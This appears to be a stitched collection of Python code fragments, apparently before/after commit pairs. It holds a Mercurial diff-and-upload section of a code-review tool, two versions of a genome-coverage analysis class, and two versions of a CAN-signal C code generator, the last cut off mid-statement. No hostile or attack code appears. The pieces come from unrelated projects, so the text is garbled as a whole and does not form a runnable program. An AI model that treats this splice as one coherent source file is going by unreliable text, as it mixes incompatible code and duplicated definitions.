        # If no file specified, restrict to the current subdir
        extra_args = extra_args or ["."]
        cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
        data = RunShell(cmd, silent_ok=True)
        svndiff = []
        filecount = 0
        for line in data.splitlines():
            m = re.match("diff --git a/(\S+) b/(\S+)", line)
            if m:
                # Modify line to make it look like as it comes from svn diff.
                # With this modification no changes on the server side are required
                # to make upload.py work with Mercurial repos.
                # NOTE: for proper handling of moved/copied files, we have to use
                # the second filename.
                filename = m.group(2)
                svndiff.append("Index: %s" % filename)
                svndiff.append("=" * 67)
                filecount += 1
                logging.info(line)
            else:
                svndiff.append(line)
        if not filecount:
            ErrorExit("No valid patches found in output from hg diff")
        return "\n".join(svndiff) + "\n"

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        args = []  # NOTE(review): unused local, kept as-is.
        status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
                          silent_ok=True)
        unknown_files = []
        for line in status.splitlines():
            # Each status line is "<st> <filename>"; "?" marks unknown files.
            st, fn = line.split(" ", 1)
            if st == "?":
                unknown_files.append(fn)
        return unknown_files

    def get_hg_status(self, rev, path):
        # We'd like to use 'hg status -C path', but that is buggy
        # (see http://mercurial.selenic.com/bts/issue3023).
        # Instead, run 'hg status -C' without a path
        # and skim the output for the path we want.
        if self.status is None:
            if use_hg_shell:
                out = RunShell(["hg", "status", "-C", "--rev", rev])
            else:
                # NOTE(review): hg_commands / hg_util are Mercurial modules
                # imported elsewhere in the full file; not visible here.
                fui = FakeMercurialUI()
                ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
                if ret:
                    raise hg_util.Abort(ret)
                out = fui.output
            self.status = out.splitlines()
        for i in range(len(self.status)):
            # line is
            #   A path
            #   M path
            # etc
            line = to_slash(self.status[i])
            if line[2:] == path:
                # A following line indented with spaces names the copy source.
                if i+1 < len(self.status) and self.status[i+1][:2] == '  ':
                    return self.status[i:i+2]
                return self.status[i:i+1]
        raise hg_util.Abort("no status for " + path)

    def GetBaseFile(self, filename):
        set_status("inspecting " + filename)
        # "hg status" and "hg cat" both take a path relative to the current subdir
        # rather than to the repo root, but "hg diff" has given us the full path
        # to the repo root.
        base_content = ""
        new_content = None
        is_binary = False
        oldrelpath = relpath = self._GetRelPath(filename)
        out = self.get_hg_status(self.base_rev, relpath)
        status, what = out[0].split(' ', 1)
        if len(out) > 1 and status == "A" and what == relpath:
            # Added-with-copy: the base content comes from the copy source.
            oldrelpath = out[1].strip()
            status = "M"
        if ":" in self.base_rev:
            base_rev = self.base_rev.split(":", 1)[0]
        else:
            base_rev = self.base_rev
        if status != "A":
            if use_hg_shell:
                base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
            else:
                base_content = str(self.repo[base_rev][oldrelpath].data())
            is_binary = "\0" in base_content  # Mercurial's heuristic
        if status != "R":
            new_content = open(relpath, "rb").read()
            is_binary = is_binary or "\0" in new_content
        if is_binary and base_content and use_hg_shell:
            # Fetch again without converting newlines
            base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
                                    silent_ok=True, universal_newlines=False)
        if not is_binary or not self.IsImage(relpath):
            new_content = None
        return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
    """Splits a patch into separate pieces for each file.

    Args:
      data: A string containing the output of svn diff.

    Returns:
      A list of 2-tuple (filename, text) where text is the svn diff output
      pertaining to filename.
    """
    patches = []
    current_name = None
    current_diff = []

    def flush():
        # Emit the accumulated diff for the current file, if any.
        if current_name and current_diff:
            patches.append((current_name, ''.join(current_diff)))

    for line in data.splitlines(True):
        started = None
        if line.startswith('Index:'):
            started = line.split(':', 1)[1].strip()
        elif line.startswith('Property changes on:'):
            # When a file is modified, paths use '/' between directories, however
            # when a property is modified '\' is used on Windows. Make them the same
            # otherwise the file shows up twice.
            candidate = to_slash(line.split(':', 1)[1].strip())
            if candidate != current_name:
                # File has property changes but no modifications, so this
                # starts a new diff.
                started = candidate
        if started:
            flush()
            current_name = started
            current_diff = [line]
        else:
            current_diff.append(line)
    flush()
    return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
    """Uploads a separate patch for each file in the diff output.

    Returns a list of [patch_key, filename] for each file.
    """
    patches = SplitPatch(data)
    rv = []
    for patch in patches:
        set_status("uploading patch for " + patch[0])
        if len(patch[1]) > MAX_UPLOAD_SIZE:
            # Oversized patches are skipped, not fatal.
            print ("Not uploading the patch for " + patch[0] +
                   " because the file is too large.")
            continue
        form_fields = [("filename", patch[0])]
        if not options.download_base:
            form_fields.append(("content_upload", "1"))
        files = [("data", "data.diff", patch[1])]
        ctype, body = EncodeMultipartFormData(form_fields, files)
        url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
        print "Uploading patch for " + patch[0]
        response_body = rpc_server.Send(url, body, content_type=ctype)
        # Expected response: first line "OK", second line the patch key.
        lines = response_body.splitlines()
        if not lines or lines[0] != "OK":
            StatusUpdate(" --> %s" % response_body)
            sys.exit(1)
        rv.append([lines[1], patch[0]])
    return rv
# ----------------------------------------------------------------------------
# Import -----------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
from biokit.stats import mixture
# Class ------------------------------------------------------------------------
class Bed_genomecov(object):
    """Create pandas dataframe of bed file provided by bedtools genomecov (-d).

    Columns are positional: 0 = chromosome, 1 = position, 2 = coverage.

    :param input_filename: the input data with results of a bedtools genomecov
        run.
    """

    def __init__(self, input_filename):
        try:
            self.df = pd.read_table(input_filename, header=None)
        except IOError as e:
            # Fixed typo in the message: "I/0" -> "I/O".
            print("I/O error({0}): {1}".format(e.errno, e.strerror))

    def __str__(self):
        return self.df.__str__()

    def moving_average(self, n):
        """Do moving average of reads coverage and create a column called 'ma'
        in data frame with results.

        The window is centred: the first and last n//2 positions are NaN.

        :param n: window's size.
        """
        ret = np.cumsum(np.array(self.df[2]), dtype=float)
        ret[n:] = ret[n:] - ret[:-n]
        ma = ret[n - 1:] / n
        mid = int(n / 2)
        self.df["ma"] = pd.Series(ma, index=np.arange(start=mid,
                                                      stop=(len(ma) + mid)))

    def coverage_scaling(self):
        """Normalize data with moving average of coverage and create a column
        called 'scale' in data frame with results.

        Needs result of moving_average().
        """
        try:
            self.df["scale"] = self.df[2] / self.df["ma"]
        except KeyError:
            print("Column 'ma' is missing.\n"
                  "You must run moving_average() function before this.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()")
            return

    def _get_best_gaussian(self, results):
        """Return the index of the fitted gaussian whose mean is closest to 1.

        :param results: mixture-fitting results exposing a ``mus`` sequence.
        """
        best_index = 0
        best_diff = float("inf")
        for i, mu in enumerate(results.mus):
            distance = abs(mu - 1)
            # Bug fix: the original stored the mean itself ("diff = value")
            # instead of its distance to 1, so later comparisons used the
            # wrong quantity and could select a sub-optimal gaussian; it also
            # left 'indice' unbound when no mean was within the start value.
            if distance < best_diff:
                best_diff = distance
                best_index = i
        return best_index

    def compute_zscore(self, k=2):
        """Compute zscore of coverage and store it in a 'zscore' column.

        Needs result of coverage_scaling().

        :param k: Number gaussian predicted in mixture (default = 2)
        """
        try:
            mf = mixture.GaussianMixtureFitting(self.df["scale"].dropna(), k=k)
        except KeyError:
            print("Column 'scale' is missing in data frame.\n"
                  "You must run coverage_scaling() function before this.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()\n"
                  "> mydata.compute_zscore()")
            return
        mf.estimate()
        self.gaussian = mf.results
        # NOTE(review): results is read both as attribute (.mus) and as a
        # mapping (["mus"]) -- presumably the biokit results object supports
        # both; confirm against biokit.stats.mixture.
        i = self._get_best_gaussian(mf.results)
        self.df["zscore"] = (self.df["scale"] - mf.results["mus"][i]) / \
            mf.results["sigmas"][i]

    def get_low_coverage(self, threshold=-3):
        """Keep position with zscore lower than INT and return a data frame.

        :param threshold: Integer
        """
        try:
            return self.df.loc[self.df["zscore"] < threshold]
        except KeyError:
            print("Column 'zscore' is missing in data frame.\n"
                  "You must run compute_zscore before get low coverage.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()\n"
                  "> mydata.compute_zscore(k=2)")

    def get_high_coverage(self, threshold=3):
        """Keep position with zscore higher than INT and return a data frame.

        :param threshold: Integer
        """
        try:
            return self.df.loc[self.df["zscore"] > threshold]
        except KeyError:
            # Fixed copy-pasted message that said "low coverage".
            print("Column 'zscore' is missing in data frame.\n"
                  "You must run compute_zscore before get high coverage.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()\n"
                  "> mydata.compute_zscore(k=2)")
# Update report_mapping.py
# Import -----------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
from biokit.stats import mixture
# Class ------------------------------------------------------------------------
class Bed_genomecov(object):
    """Create pandas dataframe of bed file provided by bedtools genomecov (-d).

    Columns are renamed to 'chr', 'pos' and 'cov' on load.

    :param input_filename: the input data with results of a bedtools genomecov
        run.
    """

    def __init__(self, input_filename):
        try:
            self.df = pd.read_table(input_filename, header=None)
            self.df = self.df.rename(columns={0: "chr", 1: "pos", 2: "cov"})
        except IOError as e:
            # Fixed typo in the message: "I/0" -> "I/O".
            print("I/O error({0}): {1}".format(e.errno, e.strerror))

    def __str__(self):
        return self.df.__str__()

    def moving_average(self, n):
        """Do moving average of reads coverage and create a column called 'ma'
        in data frame with results.

        The window is centred: the first and last n//2 positions are NaN.

        :param n: window's size.
        """
        ret = np.cumsum(np.array(self.df["cov"]), dtype=float)
        ret[n:] = ret[n:] - ret[:-n]
        ma = ret[n - 1:] / n
        mid = int(n / 2)
        self.df["ma"] = pd.Series(ma, index=np.arange(start=mid,
                                                      stop=(len(ma) + mid)))

    def coverage_scaling(self):
        """Normalize data with moving average of coverage and create a column
        called 'scale' in data frame with results.

        Needs result of moving_average().
        """
        try:
            self.df["scale"] = self.df["cov"] / self.df["ma"]
        except KeyError:
            print("Column 'ma' is missing.\n"
                  "You must run moving_average() function before this.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()")
            return

    def _get_best_gaussian(self, results):
        """Return the index of the fitted gaussian whose mean is closest to 1.

        :param results: mixture-fitting results exposing a ``mus`` sequence.
        """
        best_index = 0
        best_diff = float("inf")
        for i, mu in enumerate(results.mus):
            distance = abs(mu - 1)
            # Bug fix: the original stored the mean itself ("diff = value")
            # instead of its distance to 1, so later comparisons used the
            # wrong quantity and could select a sub-optimal gaussian; it also
            # left 'indice' unbound when no mean was within the start value.
            if distance < best_diff:
                best_diff = distance
                best_index = i
        return best_index

    def compute_zscore(self, k=2):
        """Compute zscore of coverage and store it in a 'zscore' column.

        Needs result of coverage_scaling().

        :param k: Number gaussian predicted in mixture (default = 2)
        """
        try:
            mf = mixture.GaussianMixtureFitting(self.df["scale"].dropna(), k=k)
        except KeyError:
            print("Column 'scale' is missing in data frame.\n"
                  "You must run coverage_scaling() function before this.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()\n"
                  "> mydata.compute_zscore()")
            return
        mf.estimate()
        self.gaussian = mf.results
        # NOTE(review): results is read both as attribute (.mus) and as a
        # mapping (["mus"]) -- presumably the biokit results object supports
        # both; confirm against biokit.stats.mixture.
        i = self._get_best_gaussian(mf.results)
        self.df["zscore"] = (self.df["scale"] - mf.results["mus"][i]) / \
            mf.results["sigmas"][i]

    def get_low_coverage(self, threshold=-3):
        """Keep position with zscore lower than INT and return a data frame.

        :param threshold: Integer
        """
        try:
            return self.df.loc[self.df["zscore"] < threshold]
        except KeyError:
            print("Column 'zscore' is missing in data frame.\n"
                  "You must run compute_zscore before get low coverage.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()\n"
                  "> mydata.compute_zscore(k=2)")

    def get_high_coverage(self, threshold=3):
        """Keep position with zscore higher than INT and return a data frame.

        :param threshold: Integer
        """
        try:
            return self.df.loc[self.df["zscore"] > threshold]
        except KeyError:
            # Fixed copy-pasted message that said "low coverage".
            print("Column 'zscore' is missing in data frame.\n"
                  "You must run compute_zscore before get high coverage.\n\n"
                  "Usage:\n"
                  "> mydata = Bed_genomecov('exemple.txt')\n"
                  "> mydata.moving_average(n=1000)\n"
                  "> mydata.coverage_scaling()\n"
                  "> mydata.compute_zscore(k=2)")
if __name__ == "__main__":
    # Manual smoke test: normalise coverage with a wide window, then overlay
    # moving averages of increasing window sizes for visual comparison.
    # NOTE(review): plot() and legend() are not defined in this chunk --
    # presumably pylab/matplotlib is imported elsewhere; confirm.
    mydata = Bed_genomecov("~/Documents/pasteur/py_dev/mapping_stats/output.txt")
    mydata.moving_average(n=30001)
    mydata.coverage_scaling()
    mydata.compute_zscore(k=2)
    # Raw coverage first, then successively smoother moving averages.
    plot(mydata.df["pos"], mydata.df["cov"], label="coverage")
    mydata.moving_average(n=1001)
    plot(mydata.df["pos"], mydata.df["ma"], label="w1001")
    mydata.moving_average(n=2001)
    plot(mydata.df["pos"], mydata.df["ma"], label="w2001")
    mydata.moving_average(n=5001)
    plot(mydata.df["pos"], mydata.df["ma"], label="w5001")
    mydata.moving_average(n=10001)
    plot(mydata.df["pos"], mydata.df["ma"], label="w10001")
    mydata.moving_average(n=20001)
    plot(mydata.df["pos"], mydata.df["ma"], label="w20001")
    mydata.moving_average(n=30001)
    plot(mydata.df["pos"], mydata.df["ma"], label="w30001")
    legend()
|
#!/usr/bin/env python
from collections import defaultdict
import sys
import struct
import argparse
# XXXX UGGGGGG Hack because this code is stupid.
# XXXX Should really just parse XML into some intermediate structure and then
# XXXX generate hex, code, etc. all from that format.
id_mapping = {}
# XXXX End ugly hack.
def parse_options():
    """Parse and validate the command-line options.

    Exactly one of --hex/--json must be supplied; repeated --priority
    lists are flattened into a single ordered list.

    Returns:
        the populated argparse namespace.
    """
    parser = argparse.ArgumentParser(description="Generate C source code from "
            "CAN signal descriptions in JSON or hex")
    hex_arg = parser.add_argument("-x", "--hex",
            action="store",
            dest="hex_file",
            metavar="FILE",
            help="generate source from this hex file")
    parser.add_argument("-j", "--json",
            action="append",
            type=str,
            nargs='*',
            dest="json_files",
            metavar="FILE",
            help="generate source from this JSON file")
    parser.add_argument('-p', '--priority',
            action='append',
            nargs='*',
            type=int,
            help='Ordered list of prioritized messages.')
    arguments = parser.parse_args()
    # Repeated -p flags produce a list of lists; flatten into one list.
    flattened = []
    for group in (arguments.priority or []):
        flattened.extend(group)
    arguments.priority = flattened
    # The two input formats are mutually exclusive, but one is required.
    if arguments.hex_file and arguments.json_files:
        raise argparse.ArgumentError(hex_arg,
                "Can't specify both a hex and JSON file -- pick one!")
    if not arguments.hex_file and not arguments.json_files:
        raise argparse.ArgumentError(hex_arg,
                "Must specify either a hex file or JSON file.")
    return arguments
class Signal(object):
    """One CAN signal definition; __str__ renders a C initializer entry."""

    def __init__(self, id, name, generic_name, position, length, factor=1,
            offset=0, value_handler=None, states=None):
        self.id = id
        self.name = name
        self.generic_name = generic_name
        self.position = position
        self.length = length
        self.factor = factor
        self.offset = offset
        self.value_handler = value_handler
        # Index into the generated SIGNALS array; assigned by the parser.
        self.array_index = 0
        self.states = states or []

    def __str__(self):
        # Build the C struct initializer piecewise, then join once.
        parts = ["{%d, \"%s\", %s, %d, %f, %f" % (
                self.id, self.generic_name, self.position, self.length,
                self.factor, self.offset)]
        if self.states:
            parts.append(", SIGNAL_STATES[%d], %d" % (self.id,
                    len(self.states)))
        parts.append("}, // %s" % self.name)
        return "".join(parts)
class SignalState(object):
    """A named value (state) that a stateful CAN signal can take."""

    def __init__(self, value, name):
        self.value = value
        self.name = name

    def __str__(self):
        # C initializer form, e.g. {1, "OFF"}.
        return '{%d, "%s"}' % (self.value, self.name)
class Parser(object):
    """Base class for CAN message parsers.
    Subclasses implement parse() to fill self.messages (message id -> list
    of Signal) and self.message_ids; print_source() then emits the
    generated C code on stdout.
    NOTE(review): this is Python 2 code (print statements, dict.iteritems).
    """
    def __init__(self, priority):
        # message id -> list of Signal objects parsed from the input.
        self.messages = defaultdict(list)
        # Message ids in the order they were parsed.
        self.message_ids = []
        # Running total of signals across all messages.
        self.signal_count = 0
        # Ordered list of prioritized ids used by print_filters().
        self.priority = priority
    def parse(self):
        """Populate messages/message_ids/signal_count from the input."""
        raise NotImplementedError
    def print_header(self):
        """Emit the fixed preamble of the generated C source."""
        print "#include \"canutil.h\"\n"
        print "void decodeCanMessage(int id, uint8_t* data) {"
    def print_source(self):
        """Emit the generated C: state table, signal array, decode switch
        and CAN filters, all on stdout."""
        self.print_header()
        # TODO need to handle signals with more than 10 states
        print " CanSignalState SIGNAL_STATES[%d][%d] = {" % (
            self.signal_count, 10)
        for signals in self.messages.values():
            for signal in signals:
                if len(signal.states) > 0:
                    print " {",
                    for state in signal.states:
                        print "%s," % state,
                    print "},"
        print " };"
        print " CanSignal SIGNALS[%d] = {" % self.signal_count
        # 1-based counter; the stored array_index is 0-based.
        i = 1
        for signals in self.messages.values():
            for signal in signals:
                signal.array_index = i - 1
                print " %s" % signal
                i += 1
        print " };"
        print " switch (id) {"
        for message_id, signals in self.messages.iteritems():
            print " case 0x%x:" % message_id
            for signal in signals:
                if signal.value_handler:
                    # Custom handler: declare it extern, then pass it in.
                    print (" extern %s("
                        "CanSignal*, CanSignal*, float);" %
                        signal.value_handler)
                    print (" translateCanSignal(&SIGNALS[%d], "
                        "data, &%s, SIGNALS);" % (
                        signal.array_index, signal.value_handler))
                else:
                    print " translateCanSignal(&SIGNALS[%d], data, SIGNALS);" % (
                        signal.array_index)
            print " break;"
        print " }"
        print "}\n"
        # Create a set of filters.
        self.print_filters()
    def print_filters(self):
        """Emit CAN filter mask/filter arrays, prioritized ids first.
        NOTE(review): self.priority is looked up in the module-level
        id_mapping, whose keys are signal ids (see HexParser.parse_signal)
        -- confirm callers pass signal ids here, not message ids.
        """
        priority_ids = [id_mapping[p] for p in self.priority if p in id_mapping]
        remaining_ids = [i for i in self.message_ids if i not in priority_ids]
        all_ids = priority_ids + remaining_ids
        # TODO These cast a really wide net
        masks = [(0, 0x7ff),
            (1, 0x7ff),
            (2, 0x7ff),
            (3, 0x7ff)]
        # These arrays can't be initialized when we create the variables or else
        # they end up in the .data portion of the compiled program, and it
        # becomes too big for the microcontroller. Initializing them at runtime
        # gets around that problem.
        print "int FILTER_MASK_COUNT = %d;" % len(masks)
        print "CanFilterMask FILTER_MASKS[%d];" % len(masks)
        print "int FILTER_COUNT = %d;" % len(all_ids)
        print "CanFilter FILTERS[%d];" % len(all_ids)
        print
        print "CanFilterMask* initializeFilterMasks() {"
        print "Serial.println(\"Initializing filter arrays...\");"
        print " FILTER_MASKS = {"
        for i, mask in enumerate(masks):
            print " {%d, 0x%x}," % mask
        print " };"
        print " return FILTER_MASKS;"
        print "}"
        print
        print "CanFilter* initializeFilters() {"
        print "Serial.println(\"Initializing filters...\");"
        print " FILTERS = {"
        for i, can_filter in enumerate(all_ids):
            # TODO be super smart and figure out good mask values dynamically
            print " {%d, 0x%x, %d, %d}," % (i, can_filter, 1, 0)
        print " };"
        print " return FILTERS;"
        print "}"
class HexParser(Parser):
    """Parses CAN messages/signals from a packed Intel HEX memory image."""
    def __init__(self, filename, priority):
        super(HexParser, self).__init__(priority)
        # Imported lazily so the JSON path works without intelhex installed.
        import intelhex
        self.mem = intelhex.IntelHex(filename)
    def parse(self):
        """Walk the image: each message is a '<HB' header (id, signal
        count) followed by that many packed signal records."""
        hex_offset = 1
        while hex_offset < len(self.mem):
            (message_id, num) = struct.unpack('<HB',
                self.mem.gets(hex_offset, 3))
            self.message_ids.append(message_id)
            hex_offset += 3
            for i in range(num):
                hex_offset, signal = self.parse_signal(message_id, hex_offset)
                self.signal_count += 1
                self.messages[message_id].append(signal)
    def parse_signal(self, message_id, hex_offset):
        """Decode one '<BBB' signal record at hex_offset.
        The high bit of the second byte flags an optional trailing '<ff'
        (offset, factor) pair; its low 7 bits are the bit position.
        Returns the advanced offset and the new Signal.
        """
        (signal_id, t_pos, length) = struct.unpack('<BBB',
            self.mem.gets(hex_offset, 3))
        hex_offset += 3
        # Low 7 bits: bit position; high bit: "has transform" flag.
        position = t_pos & ~(1 << 7)
        transform = (t_pos & 1 << 7) != 0
        if transform:
            (offset, factor) = struct.unpack('<ff',
                self.mem.gets(hex_offset, 8))
            hex_offset += 8
        else:
            (offset, factor) = (0.0, 1.0)
        # Record the owning message in the module-level map used later for
        # priority filter ordering.
        id_mapping[signal_id] = message_id
        return hex_offset, Signal(signal_id, "", "", position, length, factor,
            offset)
class JsonParser(Parser):
    """Parses CAN messages/signals from one or more JSON files.
    NOTE(review): Python 2 only (dict.iteritems).
    """
    def __init__(self, filenames, priority):
        super(JsonParser, self).__init__(priority)
        # List of filename entries as produced by argparse (see parse()).
        self.jsonFiles = filenames
    # The JSON parser accepts the format specified in the README.
    def parse(self):
        """Load each JSON file and build Signal objects per message."""
        import json
        for filename in self.jsonFiles:
            # Each entry is a one-element list because the -j option uses
            # action='append' with nargs='*'.
            with open(filename[0]) as jsonFile:
                self.data = json.load(jsonFile)
                for message in self.data['messages'].values():
                    self.message_ids.append(message['id'])
                    self.signal_count += len(message['signals'])
                    for signal in message['signals']:
                        states = [SignalState(value, name)
                                  for name, value in signal.get('states',
                                      {}).iteritems()]
                        # TODO we're keeping the numerical ID here even though
                        # we're not using it now because it will make switching
                        # to it in the future easier
                        self.messages[message['id']].append(
                                Signal(signal.get('id', 0),
                                       signal['name'],
                                       signal['generic_name'],
                                       signal['bit_position'],
                                       signal['bit_size'],
                                       signal.get('factor', 1),
                                       signal.get('offset', 0),
                                       signal.get('value_handler', None),
                                       states))
def main():
    """Entry point: pick the parser matching the input format, parse the
    descriptions and emit the generated C source on stdout."""
    options = parse_options()
    if options.hex_file:
        can_parser = HexParser(options.hex_file, options.priority)
    else:
        can_parser = JsonParser(options.json_files, options.priority)
    can_parser.parse()
    can_parser.print_source()


if __name__ == "__main__":
    sys.exit(main())
Remove unused priority argument.
#!/usr/bin/env python
from collections import defaultdict
import sys
import struct
import argparse
def parse_options():
    """Parse command-line options; exactly one of --hex/--json is required.

    Returns:
        the populated argparse namespace.
    """
    parser = argparse.ArgumentParser(description="Generate C source code from "
            "CAN signal descriptions in JSON or hex")
    hex_arg = parser.add_argument("-x", "--hex",
            action="store", dest="hex_file", metavar="FILE",
            help="generate source from this hex file")
    parser.add_argument("-j", "--json",
            action="append", type=str, nargs='*',
            dest="json_files", metavar="FILE",
            help="generate source from this JSON file")
    arguments = parser.parse_args()
    both = arguments.hex_file and arguments.json_files
    neither = not arguments.hex_file and not arguments.json_files
    if both:
        raise argparse.ArgumentError(hex_arg,
                "Can't specify both a hex and JSON file -- pick one!")
    if neither:
        raise argparse.ArgumentError(hex_arg,
                "Must specify either a hex file or JSON file.")
    return arguments
class Signal(object):
    """A single CAN signal; str() yields its C struct initializer line."""

    def __init__(self, id, name, generic_name, position, length, factor=1,
            offset=0, value_handler=None, states=None):
        self.id = id
        self.name = name
        self.generic_name = generic_name
        self.position = position
        self.length = length
        self.factor = factor
        self.offset = offset
        self.value_handler = value_handler
        # Position in the generated SIGNALS array (set during printing).
        self.array_index = 0
        self.states = states or []

    def __str__(self):
        base = "{%d, \"%s\", %s, %d, %f, %f" % (
                self.id, self.generic_name, self.position, self.length,
                self.factor, self.offset)
        suffix = ""
        if self.states:
            suffix = ", SIGNAL_STATES[%d], %d" % (self.id, len(self.states))
        return base + suffix + "}, // %s" % self.name
class SignalState(object):
    """A (value, name) pair describing one state of a stateful signal."""

    def __init__(self, value, name):
        self.value = value
        self.name = name

    def __str__(self):
        # Rendered as a C CanSignalState initializer.
        return "{%d, \"%s\"}" % (self.value, self.name)
class Parser(object):
    """Base class for CAN message parsers.
    Subclasses implement parse() to fill self.messages (message id -> list
    of Signal), self.message_ids and self.id_mapping; print_source() then
    emits the generated C code on stdout.
    NOTE(review): this is Python 2 code (print statements, dict.iteritems).
    """
    def __init__(self):
        # message id -> list of Signal objects parsed from the input.
        self.messages = defaultdict(list)
        # Message ids in the order they were parsed.
        self.message_ids = []
        # signal id -> message id, filled in by subclasses while parsing.
        self.id_mapping = {}
        # Running total of signals across all messages.
        self.signal_count = 0
    def parse(self):
        """Populate messages/message_ids/signal_count from the input."""
        raise NotImplementedError
    def print_header(self):
        """Emit the fixed preamble of the generated C source."""
        print "#include \"canutil.h\"\n"
        print "void decodeCanMessage(int id, uint8_t* data) {"
    def print_source(self):
        """Emit the generated C: state table, signal array, decode switch
        and CAN filters, all on stdout."""
        self.print_header()
        # TODO need to handle signals with more than 10 states
        print " CanSignalState SIGNAL_STATES[%d][%d] = {" % (
            self.signal_count, 10)
        for signals in self.messages.values():
            for signal in signals:
                if len(signal.states) > 0:
                    print " {",
                    for state in signal.states:
                        print "%s," % state,
                    print "},"
        print " };"
        print " CanSignal SIGNALS[%d] = {" % self.signal_count
        # 1-based counter; the stored array_index is 0-based.
        i = 1
        for signals in self.messages.values():
            for signal in signals:
                signal.array_index = i - 1
                print " %s" % signal
                i += 1
        print " };"
        print " switch (id) {"
        for message_id, signals in self.messages.iteritems():
            print " case 0x%x:" % message_id
            for signal in signals:
                if signal.value_handler:
                    # Custom handler: declare it extern, then pass it in.
                    print (" extern %s("
                        "CanSignal*, CanSignal*, float);" %
                        signal.value_handler)
                    print (" translateCanSignal(&SIGNALS[%d], "
                        "data, &%s, SIGNALS);" % (
                        signal.array_index, signal.value_handler))
                else:
                    print " translateCanSignal(&SIGNALS[%d], data, SIGNALS);" % (
                        signal.array_index)
            print " break;"
        print " }"
        print "}\n"
        # Create a set of filters.
        self.print_filters()
    def print_filters(self):
        """Emit CAN filter mask/filter arrays for every parsed message."""
        # TODO These cast a really wide net
        masks = [(0, 0x7ff),
            (1, 0x7ff),
            (2, 0x7ff),
            (3, 0x7ff)]
        # These arrays can't be initialized when we create the variables or else
        # they end up in the .data portion of the compiled program, and it
        # becomes too big for the microcontroller. Initializing them at runtime
        # gets around that problem.
        print "int FILTER_MASK_COUNT = %d;" % len(masks)
        print "CanFilterMask FILTER_MASKS[%d];" % len(masks)
        print "int FILTER_COUNT = %d;" % len(self.message_ids)
        print "CanFilter FILTERS[%d];" % len(self.message_ids)
        print
        print "CanFilterMask* initializeFilterMasks() {"
        print "Serial.println(\"Initializing filter arrays...\");"
        print " FILTER_MASKS = {"
        for i, mask in enumerate(masks):
            print " {%d, 0x%x}," % mask
        print " };"
        print " return FILTER_MASKS;"
        print "}"
        print
        print "CanFilter* initializeFilters() {"
        print "Serial.println(\"Initializing filters...\");"
        print " FILTERS = {"
        for i, can_filter in enumerate(self.message_ids):
            # TODO be super smart and figure out good mask values dynamically
            print " {%d, 0x%x, %d, %d}," % (i, can_filter, 1, 0)
        print " };"
        print " return FILTERS;"
        print "}"
class HexParser(Parser):
    """Parses CAN messages/signals from a packed Intel HEX memory image."""
    def __init__(self, filename):
        super(HexParser, self).__init__()
        # Imported lazily so the JSON path works without intelhex installed.
        import intelhex
        self.mem = intelhex.IntelHex(filename)
    def parse(self):
        """Walk the image: each message is a '<HB' header (id, signal
        count) followed by that many packed signal records."""
        hex_offset = 1
        while hex_offset < len(self.mem):
            (message_id, num) = struct.unpack('<HB',
                self.mem.gets(hex_offset, 3))
            self.message_ids.append(message_id)
            hex_offset += 3
            for i in range(num):
                hex_offset, signal = self.parse_signal(message_id, hex_offset)
                self.signal_count += 1
                self.messages[message_id].append(signal)
    def parse_signal(self, message_id, hex_offset):
        """Decode one '<BBB' signal record at hex_offset.
        The high bit of the second byte flags an optional trailing '<ff'
        (offset, factor) pair; its low 7 bits are the bit position.
        Returns the advanced offset and the new Signal.
        """
        (signal_id, t_pos, length) = struct.unpack('<BBB',
            self.mem.gets(hex_offset, 3))
        hex_offset += 3
        # Low 7 bits: bit position; high bit: "has transform" flag.
        position = t_pos & ~(1 << 7)
        transform = (t_pos & 1 << 7) != 0
        if transform:
            (offset, factor) = struct.unpack('<ff',
                self.mem.gets(hex_offset, 8))
            hex_offset += 8
        else:
            (offset, factor) = (0.0, 1.0)
        # Record the owning message in the per-parser mapping.
        self.id_mapping[signal_id] = message_id
        return hex_offset, Signal(signal_id, "", "", position, length, factor,
            offset)
class JsonParser(Parser):
    """Parses CAN messages/signals from one or more JSON files.
    NOTE(review): Python 2 only (dict.iteritems).
    """
    def __init__(self, filenames):
        super(JsonParser, self).__init__()
        # List of filename entries as produced by argparse (see parse()).
        self.jsonFiles = filenames
    # The JSON parser accepts the format specified in the README.
    def parse(self):
        """Load each JSON file and build Signal objects per message."""
        import json
        for filename in self.jsonFiles:
            # Each entry is a one-element list because the -j option uses
            # action='append' with nargs='*'.
            with open(filename[0]) as jsonFile:
                self.data = json.load(jsonFile)
                for message in self.data['messages'].values():
                    self.message_ids.append(message['id'])
                    self.signal_count += len(message['signals'])
                    for signal in message['signals']:
                        states = [SignalState(value, name)
                                  for name, value in signal.get('states',
                                      {}).iteritems()]
                        # TODO we're keeping the numerical ID here even though
                        # we're not using it now because it will make switching
                        # to it in the future easier
                        self.messages[message['id']].append(
                                Signal(signal.get('id', 0),
                                       signal['name'],
